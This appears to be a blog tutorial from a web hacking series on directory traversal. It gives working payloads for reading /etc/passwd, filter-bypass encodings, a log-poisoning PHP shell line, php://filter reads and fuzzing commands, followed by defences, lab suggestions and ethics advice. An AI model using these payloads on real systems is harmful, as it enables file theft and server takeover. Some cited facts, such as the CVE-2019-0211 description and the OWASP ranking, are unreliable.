Web Hacking Series - Part 9: Directory Traversal – Escaping the Web Root Jail🔓📂🚀

rocky · 12 Mar

Hey guys, Rocky here! 🚪🔓

Welcome to Day 9 of the Daily Web Hacking series! So far, we’ve tackled authentication bypasses, file upload vulns, and XSS. Today, we’re diving into Part 9: Directory Traversal—the hack that lets you “escape” a website’s restricted folders and rummage through the server’s entire file system. Imagine breaking out of a prison cell only to find the warden’s secret file cabinet. Let’s get into it!

—

What is Directory Traversal?

Directory Traversal (aka Path Traversal) is a vulnerability that allows attackers to read, write, or execute files outside the web root directory (the folder where the website’s public files live). By manipulating file paths (e.g., ../../), hackers can:

Steal sensitive files (/etc/passwd, .env, backups).
Access source code or configuration files.
Plant malware or overwrite critical system files.

Why it’s dangerous:

#4 in the OWASP Top 10 (Path Traversal, 2021).
Found in 33% of web apps (Snyk, 2023).
Can lead to full server compromise.

—

How Directory Traversal Works

Web apps often use user-supplied input to load files (e.g., profile pictures, PDFs). If the app doesn’t sanitize input properly, attackers can inject path sequences like ../ to “escape” the web root.

Example:
A site loads user avatars via:

https://site.com/load?file=rocky.jpg

An attacker changes file=rocky.jpg to:

file=../../../../etc/passwd

Result: The server returns the /etc/passwd file, exposing system users!

—

Types of Directory Traversal

1. Basic Traversal

Use ../ (Unix) or ..\ (Windows) to climb directories.

Payload:

  ../../../../etc/passwd

2. Encoded Traversal

Bypass filters with URL encoding, double encoding, or Unicode.
Payloads:
- URL-encoded: ..%2F..%2Fetc%2Fpasswd
- Double-encoded: ..%252F..%252Fetc%252Fpasswd

3. Null Byte Injection

Terminate the filename early to bypass appending extensions.

Payload:

  ../../etc/passwd%00.jpg

The server processes passwd%00 as passwd, ignoring .jpg.

4. Absolute Path Abuse

Directly reference absolute paths (if allowed).

Payload:

  /etc/passwd

—

Real-World Directory Traversal Disasters

Apache (2019): CVE-2019-0211 allowed traversal via PHP scripts.
WordPress (2017): Plugin flaw exposed wp-config.php files.
Tesla (2018): Misconfigured servers leaked vehicle telemetry.

Lesson: Even tech giants mess up.

—

Step-by-Step Exploitation

Goal: Steal the /etc/passwd file from a vulnerable photo-sharing site.

1. Find a Vulnerable Endpoint

Look for parameters like ?file=, ?page=, or ?load=.

Example URL:

  https://hacklivly.com/view?image=profile.jpg

2. Test Basic Traversal

Modify the parameter:

  image=../../../../etc/passwd

If the server returns the file, you’ve won!

3. Bypass Filters

If blocked, try encoding:

  image=..%2F..%2Fetc%2Fpasswd

Or add a null byte:

  image=../../etc/passwd%00.jpg

4. Escalate Access

Steal config files: .env, config.php, wp-config.php.
Execute code: If you can write files, upload a web shell.

—

Advanced Traversal Tactics

1. Writing Files

How: If the app lets you upload or modify files.

Payload:

  ../../var/www/html/shell.php

Impact: Execute commands via https://site.com/shell.php.

2. Log Poisoning

Inject PHP into log files (e.g., access.log), then traverse to them:

  GET /<?php system($_GET['cmd']); ?>

Trigger execution:

  https://site.com/view?file=../../var/log/apache2/access.log&cmd=id

3. PHP Wrappers

Use php://filter to read encoded files:

  file=php://filter/convert.base64-encode/resource=../../etc/passwd

Decode the Base64 output to get the file.

—

Tools for Directory Traversal

1. Burp Suite

Repeater: Test payloads manually.
Intruder: Brute-force common paths (/etc/passwd, .env).

2. DotDotPwn

Automated directory traversal tool:

  dotdotpwn -m http -h hacklivly.com -x /load?file=TRAVERSAL

3. FFUF (Fuzz Faster U Fool)

Fuzz for exposed files:

  ffuf -w paths.txt -u https://hacklivly.com/view?file=FUZZ

—

Defending Against Directory Traversal

For Developers

Input Validation

Block ../, ..\, and absolute paths.

PHP Example:

     $file = basename($_GET['file']); // Strips path info

Whitelist Allowed Files

Use a mapping of allowed filenames:

     allowed_files = {"profile.jpg": "images/profile.jpg"}  
     file = allowed_files.get(request.args.get('file'), "default.jpg")

Use Platform-Safe Functions
- Python: os.path.realpath() + check if path starts with web root.
- Java: Path.normalize() + validate.
Store Files Outside Web Root
- Serve files via a secure proxy script.

For Admins

File Permissions

Restrict read/write access to web directories.

   chmod 755 /var/www/html

Web Application Firewall (WAF)
- Block requests with ../, etc/passwd, etc.
Log Monitoring
- Alert on repeated traversal attempts.

—

Practice Legally: Labs & Challenges

DVWA (Damn Vulnerable Web App):
- Practice traversal in the File Inclusion module.
PortSwigger Labs:
- Free labs: Directory Traversal.
Hack The Box:
- Machines like Traverxec focus on path traversal.

—

Ethical Hacking & Reporting

Never exploit traversal vulns without permission. If you find one:

Document: Record steps to reproduce.
Report: Use the site’s security contact or bug bounty program.
Disclose: Wait for a fix before sharing publicly.

—

Final Thoughts

Directory traversal is the digital equivalent of picking a lock. It’s simple, silent, and shockingly effective. By validating inputs, hardening servers, and thinking like a hacker, you can slam the door on this attack.

Remember: The web’s security depends on you. Find flaws, fix them, and keep the internet safe—one ../ at a time.

Rocky out! ✌️

—

P.S. If you’re loving this series, share it with your crew! Let’s turn script kiddies into security guardians.

Discussion Question: What’s the wildest file you’ve accessed via traversal? I once found a database backup chilling in /var/backups. 😅 Spill your stories below! 👇